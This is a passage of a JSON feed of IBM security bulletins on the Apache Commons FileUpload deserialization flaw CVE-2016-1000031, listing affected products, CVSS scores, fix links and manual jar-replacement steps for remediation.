[_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in several products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM SPSS Analytic Server 2.0.0.0 \nIBM SPSS Analytic Server 2.1.0.0 \nIBM SPSS Analytic Server 3.0.0.0 \nIBM SPSS Analytic Server 3.0.1.0 \nIBM SPSS Analytic Server 3.1.0.0 \nIBM SPSS Analytic Server 3.1.1.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the appropriate IBM\u00ae WebSphere\u2122 Application Server update and the IBM SPSS Analytic Server interim fix that is appropriate for your environment. \n \nThe IBM\u00ae WebSphere\u2122 Application Server update is discussed in a separate [_security bulletin_](<http://www-01.ibm.com/support/docview.wss?uid=swg22011428>). \n \n\n\n_Product_| _VRMF_| _Remediation/First Fix_ \n---|---|--- \nSPSS Analytic Server| _2.0.0.0_| [https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Analytic+Server&release=All&platform=All&function=fixId&fixids=2.0.0.1-ANLSVR-Linux8664-PPC64LE-ApacheCommonsFileUpload133:0&includeSupersedes=0&source=fc&login=true](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Analytic+Server&release=All&platform=All&function=fixId&fixids=2.0.0.1-ANLSVR-Linux8664-PPC64LE-ApacheCommonsFileUpload133:0&includeSupersedes=0&source=fc&login=true>) \nSPSS Analytic Server| 2.1.0.0| [https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Analytic+Server&release=All&platform=All&function=fixId&fixids=2.1.0.2-ANLSVR-Linux8664-PPC64LE-ApacheCommonsFileUpload133:0&includeSupersedes=0&source=fc&login=true](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Analytic+Server&release=All&platform=All&function=fixId&fixids=2.1.0.2-ANLSVR-Linux8664-PPC64LE-ApacheCommonsFileUpload133:0&includeSupersedes=0&source=fc&login=true>) \nSPSS Analytic Server| _3.0.0.0_| [https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Analytic+Server&release=All&platform=All&function=fixId&fixids=3.0.0.0-ANLSVR-Linux8664-PPC64LE-ApacheCommonsFileUpload133:0&includeSupersedes=0&source=fc&login=true](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Analytic+Server&release=All&platform=All&function=fixId&fixids=3.0.0.0-ANLSVR-Linux8664-PPC64LE-ApacheCommonsFileUpload133:0&includeSupersedes=0&source=fc&login=true>) \nSPSS Analytic Server| _3.0.1.0_| [https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Analytic+Server&release=All&platform=All&function=fixId&fixids=3.0.1.1-ANLSVR-Linux8664-PPC64LE-ApacheCommonsFileUpload133:0&includeSupersedes=0&source=fc&login=true](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Analytic+Server&release=All&platform=All&function=fixId&fixids=3.0.1.1-ANLSVR-Linux8664-PPC64LE-ApacheCommonsFileUpload133:0&includeSupersedes=0&source=fc&login=true>) \nSPSS Analytic Server| _3.1.0.0_| [https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Analytic+Server&release=All&platform=All&function=fixId&fixids=3.1.0.0-ANLSVR-Linux8664-PPC64LE-ApacheCommonsFileUpload133:0&includeSupersedes=0&source=fc&login=true](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Analytic+Server&release=All&platform=All&function=fixId&fixids=3.1.0.0-ANLSVR-Linux8664-PPC64LE-ApacheCommonsFileUpload133:0&includeSupersedes=0&source=fc&login=true>) \nSPSS Analytic Server| _3.1.1.0_| [https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Analytic+Server&release=All&platform=All&function=fixId&fixids=3.1.1.1-ANLSVR-Linux8664-PPC64LE-ApacheCommonsFileUpload133:0&includeSupersedes=0&source=fc&login=true](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Analytic+Server&release=All&platform=All&function=fixId&fixids=3.1.1.1-ANLSVR-Linux8664-PPC64LE-ApacheCommonsFileUpload133:0&includeSupersedes=0&source=fc&login=true>) \n \nYou should verify applying this fix does not cause any compatibility issue in your environment. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T14:19:52", "type": "ibm", "title": "Security Bulletin: Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server affects IBM SPSS Analytic Server (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-16T14:19:52", "id": "7EFB522319684542D37BC81717D35991CE91F1752F5381EA6BFA2B84165FC89C", "href": "https://www.ibm.com/support/pages/node/569701", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:43:57", "description": "## Summary\n\nApache Commons FileUpload could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Monitoring 8.1.3 \nIBM Advanced Diagnostics 8.1.3 \nIBM Application Performance Management 8.1.3 \nIBM Application Performance Management Advanced 8.1.3 \nIBM Cloud Application Performance Management, Base Private 8.1.4 \nIBM Cloud Application Performance Management, Advanced Private 8.1.4 \nIBM Cloud Application Performance Management\n\n## Remediation/Fixes\n\n_Product_\n\n| _Product_ \n_VRMF_| _Remediation_ \n---|---|--- \nIBM Monitoring \n\nIBM Application Diagnostics\n\nIBM Application Performance Management\n\nIBM Application Performance Management Advanced\n\n| _8.1.3 _ \n \n \n_ _| The vulnerability can be remediated by applying the following 8.1.3.0-IBM-IPM-SERVER-IF0012 server patch to the system where the Performance Management server is installed: [http://www-01.ibm.com/support/docview.wss?rs=0&uid=isg400003854](<http://www-01.ibm.com/support/docview.wss?rs=0&uid=isg400003854>)\n\nThe vulnerability can be remediated by applying the following 8.1.3.0-IBM-IPM-GATEWAY-IF0008 Hybrid Gateway patch to the system where the Hybrid Gateway is installed: [https://www-01.ibm.com/support/docview.wss?rs=0&uid=isg400003853](<https://www-01.ibm.com/support/docview.wss?rs=0&uid=isg400003853>) \n \nIBM Cloud Application Performance Management Base Private \n\nIBM Cloud Application Performance Management Advanced Private\n\n| _8.1.4_| The vulnerability can be remediated by applying the following 8.1.4.0-IBM-APM-SERVER-IF0004 server patch to the system where the Cloud APM server is installed: [http://www-01.ibm.com/support/docview.wss?rs=0&uid=isg400003783](<http://www-01.ibm.com/support/docview.wss?rs=0&uid=isg400003783>)\n\nThe vulnerabilities can be remediated by applying the following 8.1.4.0-IBM-APM-GATEWAY-IF0003 Hybrid Gateway patch to the system where the Hybrid Gateway is installed: [https://www.ibm.com/support/docview.wss?rs=0&uid=isg400003809](<https://www.ibm.com/support/docview.wss?rs=0&uid=isg400003809>) \n \nIBM Cloud Application Performance Management| _N.A_| The vulnerabilities can be remediated by applying the following 8.1.4.0-IBM-APM-GATEWAY-IF0003 Hybrid Gateway patch to the system where the Hybrid Gateway is installed: [https://www.ibm.com/support/docview.wss?rs=0&uid=isg400003809](<https://www.ibm.com/support/docview.wss?rs=0&uid=isg400003809>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:51:30", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Commons FileUpload affects the IBM Performance Management product (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T15:51:30", "id": "BABF5F87446773F486C4241A55805D7AF675A10E3D8F7FB739A641C0B3FD8389", "href": "https://www.ibm.com/support/pages/node/570555", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:45:38", "description": "## Summary\n\nJazz for Service Management (JazzSM) is affected by an Apache Commons FileUpload vulnerability. JazzSM has addressed this vulnerability\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** JazzSM could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of FileUpload library. A attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nJazz for Service Management version 1.1.3\n\n## Remediation/Fixes\n\nPrincipal Product and Version(s)\n\n| Cumulative Patch Level \n---|--- \nJazz for Service Management version 1.1.3| Apache Commons FileUpload Vulnerability addressed with JazzSM 1.1.3 Cumulative Patch level 5 \n[1.1.3.0-TIV-JazzSM-DASH-Cumulative-Patch-0005 ](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=1.1&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:47:49", "type": "ibm", "title": "Security Bulletin: Apache Commons FileUpload Vulnerability affects Jazz for Service Management (JazzSM) (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T15:47:49", "id": "76322F4FDE913CCFF696E95021198B9D1B68711EA0FBA9EE3CF9E433336206FD", "href": "https://www.ibm.com/support/pages/node/300801", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-24T01:40:29", "description": "## Summary\n\nIBM OpenPages GRC Platform has addressed vulnerability in Apache Commons FileUpload (CVE-2016-1000031)\n\n## Vulnerability Details\n\n**CVEID: ** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION: **Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM OpenPages GRC Platform version 8.0\n\n## Remediation/Fixes\n\nA fix has been created for each affected version of the named product. Download and install the fix as soon as possible. Fixes and installation instructions are provided at the URLs listed below: \n\n\n**Product** | **VRMF** | **Remediation/First Fix** \n---|---|--- \nIBM OpenPages GRC Platform **8.0** \n| 8.0.0.3.2 | <https://www.ibm.com/support/pages/openpages-grc-platform-8003-interim-fix-2-0> \n \n## Workarounds and Mitigations\n\nNone known, apply fixes.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-28T21:24:00", "type": "ibm", "title": "Security Bulletin: IBM OpenPages GRC Platform is affected by a vulnerability in Apache Commons FileUpload (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2019-10-28T21:24:00", "id": "7948B558E9BBB9D7B19D137E1C7944C490BD5D26DB24595F235B080A97AD570E", "href": "https://www.ibm.com/support/pages/node/1098927", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:47:31", "description": "## Summary\n\nA security vulnerability affects IBM Watson Explorer Analytical Components, Watson Explorer Foundational Components Annotation Administration Console and Watson Content Analytics.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in certain products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe vulnerability applies to the following product and version: \n\n * Watson Explorer Analytical Components Version 11.0.0.0 - 11.0.0.3, 11.0.1.0, 11.0.2.0 - 11.0.2.1, Version 10.0.0.0 - 10.0.0.2\n * IBM Watson Explorer Foundational Components Annotation Administration Console Version 11.0.0.0 - 11.0.0.3, 11.0.1.0, 11.0.2.0 - 11.0.2.1, Version 10.0.0.0 - 10.0.0.2\n * Watson Content Analytics Version 3.5.0.0 - 3.5.0.4\n\n## Remediation/Fixes\n\nFor information about fixes, see the applicable row in the following table. The table reflects product names at the time the specified versions were released. To use the links to Fix Central in this table, you must first log in to the IBM Support: Fix Central site at <http://www.ibm.com/support/fixcentral/>. \n \n\n\n**Affected Product**| **Affected Versions**| **Fix** \n---|---|--- \nWatson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, 11.0.1, 11.0.2.0 - 11.0.2.1| Upgrade to Watson Explorer Analytical Components Version 11.0.2.2. For information about this version, and links to the software and release notes, see the [download document](<http://www.ibm.com/support/docview.wss?uid=swg24044331>). For information about upgrading, see the [upgrade procedures](<http://www.ibm.com/support/docview.wss?uid=swg27049072>). \nWatson Explorer Analytical Components| 10.0.0.0 - 10.0.0.2| \n\n 1. If not already installed, install V10.0 Fix Pack 2 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24039430>)).\n 2. Download the package from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=10.0.0.2&platform=All&function=all#Others>): interim fix **10.0.0.2-WS-WatsonExplorer-<edition>-IF003** or later. (For example, **10.0.0.2-WS-WatsonExplorer-AE-IF003**.)\n 3. To install the fix, see [Watson Explorer Content Analytics: Interim Fix Readme](<https://www.ibm.com/support/docview.wss?uid=swg22011367>) . \nIBM Watson Explorer Foundational Components Annotation Administration Console| 11.0.0.0 - 11.0.0.3, 11.0.1, 11.0.2.0 - 11.0.2.1| Upgrade to Watson Explorer Foundational Components Annotation Administration Console Version 11.0.2.2. For information about this version, and links to the software and release notes, see the [download document](<http://www.ibm.com/support/docview.wss?uid=swg24044332>). For information about upgrading, see the [upgrade procedures](<http://www-01.ibm.com/support/docview.wss?uid=swg27048896>). \nIBM Watson Explorer Foundational Components Annotation Administration Console| 10.0 - 10.0.0.2| \n\n 1. If not already installed, install V10.0 Fix Pack 2 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24039429>)).\n 2. Download the package from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=10.0.0.2&platform=All&function=all#Others>): interim fix **10.0.0.2-WS-WatsonExplorer-<edition>-IF003** or later. (For example, **10.0.0.2-WS-WatsonExplorer-EE-IF003**.)\n 3. To install the fix, see [Watson Explorer Content Analytics: Interim Fix Readme](<https://www.ibm.com/support/docview.wss?uid=swg22011367>) . \nWatson Content Analytics| 3.5.0.0 - 3.5.0.4| \n\n 1. If not already installed, install Watson Content Analytics Version 3.5 Fix Pack 4 (see the Fix Pack [ ](<www.ibm.com/support/docview.wss?uid=swg24039429>)[download document](<http://www.ibm.com/support/docview.wss?uid=swg24042836>)).\n 2. Download the package from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=10.0.0.2&platform=All&function=all#Others>): interim fix **3.5.0.4-WT-WCA-IF001**.\n 3. To install the fix, see [Watson Explorer Content Analytics: Interim Fix Readme](<https://www.ibm.com/support/docview.wss?uid=swg22011367>) . \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T13:09:50", "type": "ibm", "title": "Security Bulletin: Vulnerability affects Watson Explorer Analytical Components, Watson Explorer Foundational Components Annotation Administration Console and Watson Content Analytics", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T13:09:50", "id": "D5934C683F70DCBE4AED04C1CC98975A5321914D3F2282A47A2535F0FC4F1834", "href": "https://www.ibm.com/support/pages/node/300529", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:51:28", "description": "## Summary\n\nA security vulnerability relating to remote code execution CVE-2016-1000031 has been reported against Apache Commons FileUpload DiskFileItem File Manipulation, which IBM Spectrum Conductor with Spark 2.2.0 uses as a framework for some services. Commons FileUpload 1.3.3 addresses this vulnerability and can be applied through the manual steps detailed in the Remediation section. \n\n## Vulnerability Details\n\n**CVEID:** CVE-2016-1000031 \n**DESCRIPTION:** A vulnerability in IBM Spectrum Conductor with Spark 2.2.0 could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of FileUpload library. A attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \n**CVSS V3 Base Score: **7.5 HIGH \nCVSS V3 Vector: [_CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H_](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?name=CVE-2016-1000031&vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) ([_legend_](<https://nvd.nist.gov/vuln-metrics/cvss>)) \nCVSS V3 Impact Score: 5.9 \nCVSS V3 Exploitability Score: 3.9\n\n## Affected Products and Versions\n\nIBM Spectrum Conductor with Spark 2.2.0. All architectures. The remediation steps are provided in this document.\n\n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\n1.1 Log on to each management host in the cluster and download the commons-fileupload-1.3.3-bin.tar.gz package from the following location: \n \n<http://archive.apache.org/dist/commons/fileupload/binaries/commons-fileupload-1.3.3-bin.tar.gz> \n \n1.2 Stop the following services: \n \n> egosh service stop WEBGUI REST ascd plc purger \n \n1.3 For backup purposes, move the following files, which will be replaced by new files: \n \n> mkdir -p /tmp/cf121backup/ \n \n> mkdir -p /tmp/cf131backup/ \n \nMake note of the file owner, group, and permissions for the following files: \n>ls -la $EGO_TOP/gui/3.5/lib/commons-fileupload-*.jar \n>ls -la $EGO_TOP/perf/3.5/lib/commons-fileupload-*.jar \n>ls -la $EGO_TOP/ascd/2.2.0/lib/commons-fileupload-*.jar \n>ls -la $EGO_TOP/wlp/usr/servers/rest/apps/3.5/deploymentrest/WEB-INF/lib/commons-fileupload-*.jar \n \n> mv $EGO_TOP/gui/3.5/lib/commons-fileupload-*.jar /tmp/cf131backup \n \n> mv $EGO_TOP/perf/3.5/lib/commons-fileupload-*.jar /tmp/cf121backup/ \n \n> rm $EGO_TOP/ascd/2.2.0/lib/commons-fileupload-*.jar \n \n> rm $EGO_TOP/wlp/usr/servers/rest/apps/3.5/deploymentrest/WEB-INF/lib/commons-fileupload-*.jar \n \n1.4 On each management host, decompress the commons-fileupload-1.3.3-bin.tar.gz package and copy the following files to your cluster directory: \n \n> tar zxf commons-fileupload-1.3.3-bin.tar.gz \n \n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/gui/3.5/lib/ \n \n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/perf/3.5/lib/ \n \n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/ascd/2.2.0/lib/ \n \n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/wlp/usr/servers/rest/apps/3.5/deploymentrest/WEB-INF/lib/ \n \nIf needed, restore the original file permissions with: \n> chmod ### [file] \n \nIf needed, restore the original file owner and group with: \n> chown [user]:[group] [file] \n \n1.5 On each management host, clean up the GUI work directories: \n \n> rm -rf $EGO_TOP/gui/work/* \n \n> rm -rf $EGO_TOP/gui/workarea/* \n \n**NOTE:** If you configured the **WLP_OUTPUT_DIR** parameter and **APPEND_HOSTNAME_TO_WLP_OUTPUT_DIR** is set to true in the $EGO_CONFDIR/wlp.conf file, you must clean up the $WLP_OUTPUT_DIR/**_webgui_hostname_**/gui/workarea/ directory. \n \n1.6 Launch a web browser and clear your browser cache. \n \n1.7 Start the following services: \n \n> egosh service start WEBGUI REST ascd plc purger\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:42:36", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons FileUpload DiskFileItem File Manipulation affects IBM Spectrum Conductor with Spark 2.2.0 (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-18T01:42:36", "id": "A4EB252B4F9B1D9E6B670EA990F738AB583192588E1566F20330B6E3CFCB3AA1", "href": "https://www.ibm.com/support/pages/node/664689", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:45:56", "description": "## Summary\n\nA vulnerability for Apache Commons FileUpload before 1.3.3 has been reported which allows a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in certain products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n * \n\\- IBM Business Process Manager V7.5.0.0 through V7.5.1.2\n\n\\- IBM Business Process Manager V8.0.0.0 through V8.0.1.3\n\n\\- IBM Business Process Manager V8.5.0.0 through 